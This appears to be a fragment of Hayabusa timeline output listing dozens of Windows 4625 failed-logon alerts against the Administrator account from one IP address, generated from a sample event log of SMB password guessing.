+2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
